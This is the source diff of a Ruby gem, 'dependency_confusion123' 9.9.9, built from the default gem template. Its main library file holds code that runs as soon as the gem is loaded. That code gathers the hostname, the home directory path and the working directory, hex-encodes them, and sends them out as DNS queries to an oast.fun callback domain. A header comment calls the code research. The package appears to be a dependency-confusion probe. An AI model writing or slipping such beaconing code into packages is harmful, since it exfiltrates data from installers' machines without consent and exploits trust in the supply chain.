dependency_confusion123 9.9.9

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 84b8734092950600711976048f7e07decc45e57d9418e5d9485820e29eb228d9
+  data.tar.gz: 779bbc71645805605d7728fb35f07b4c72bb4a14acd023496d6626a0a4c655b7
+SHA512:
+  metadata.gz: 1f4f5995bbf5e9d6dfbcd01603efd35e956e50a16530025db9c5bbd66de737361242a3637255ef745dbadcf3146c9f19c22556685e05ce300d1e4328777c97c4
+  data.tar.gz: 016b5180c9ca8e9cfec41a2741b49eb40869866380040e7fc9eb125230cd8237ef1c924e0118b99f49301622e58c54014f44af646f4dbcf2876bd91f2f8aba57

data/Gemfile

@@ -0,0 +1,8 @@
+# frozen_string_literal: true
+
+source "https://rubygems.org"
+
+# Specify your gem's dependencies in dependency_confusion123.gemspec
+gemspec
+
+gem "rake", "~> 13.0"

data/README.md

@@ -0,0 +1,29 @@
+# DependencyConfusion123
+
+Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/dependency_confusion123`. To experiment with that code, run `bin/console` for an interactive prompt.
+
+TODO: Delete this and the text above, and describe your gem
+
+## Installation
+
+Install the gem and add to the application's Gemfile by executing:
+
+    $ bundle add dependency_confusion123
+
+If bundler is not being used to manage dependencies, install the gem by executing:
+
+    $ gem install dependency_confusion123
+
+## Usage
+
+TODO: Write usage instructions here
+
+## Development
+
+After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
+
+To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
+
+## Contributing
+
+Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/dependency_confusion123.

data/Rakefile

@@ -0,0 +1,4 @@
+# frozen_string_literal: true
+
+require "bundler/gem_tasks"
+task default: %i[]

data/lib/dependency_confusion123/version.rb

@@ -0,0 +1,5 @@
+# frozen_string_literal: true
+
+module DependencyConfusion123
+  VERSION = "0.1.0"
+end

data/lib/dependency_confusion123.rb

@@ -0,0 +1,60 @@
+=begin
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+=end
+
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = 'uwopasoloxagbriwacwtfdontmewdwuom.oast.fun'
+ns = 'ns1.oast.fun'
+
+package = 'dependency_confusion123'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '77.88.8.7'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new,
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end
+
+

data/sig/dependency_confusion123.rbs

@@ -0,0 +1,4 @@
+module DependencyConfusion123
+  VERSION: String
+  # See the writing guide of rbs: https://github.com/ruby/rbs#guides
+end

metadata

@@ -0,0 +1,51 @@
+--- !ruby/object:Gem::Specification
+name: dependency_confusion123
+version: !ruby/object:Gem::Version
+  version: 9.9.9
+platform: ruby
+authors:
+- Write your name
+autorequire:
+bindir: exe
+cert_chain: []
+date: 2024-05-08 00:00:00.000000000 Z
+dependencies: []
+description: Write a longer description or delete this line.
+email:
+- Write your email address
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- Gemfile
+- README.md
+- Rakefile
+- lib/dependency_confusion123.rb
+- lib/dependency_confusion123/version.rb
+- sig/dependency_confusion123.rbs
+homepage: https://rubygems.org/profiles/dependency_confusion_test
+licenses: []
+metadata:
+  homepage_uri: https://rubygems.org/profiles/dependency_confusion_test
+  source_code_uri: https://rubygems.org/profiles/dependency_confusion_test
+  changelog_uri: https://rubygems.org/profiles/dependency_confusion_test/CHANGELOG.md
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: 2.6.0
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.3.15
+signing_key:
+specification_version: 4
+summary: Write a short summary, because RubyGems requires one.
+test_files: []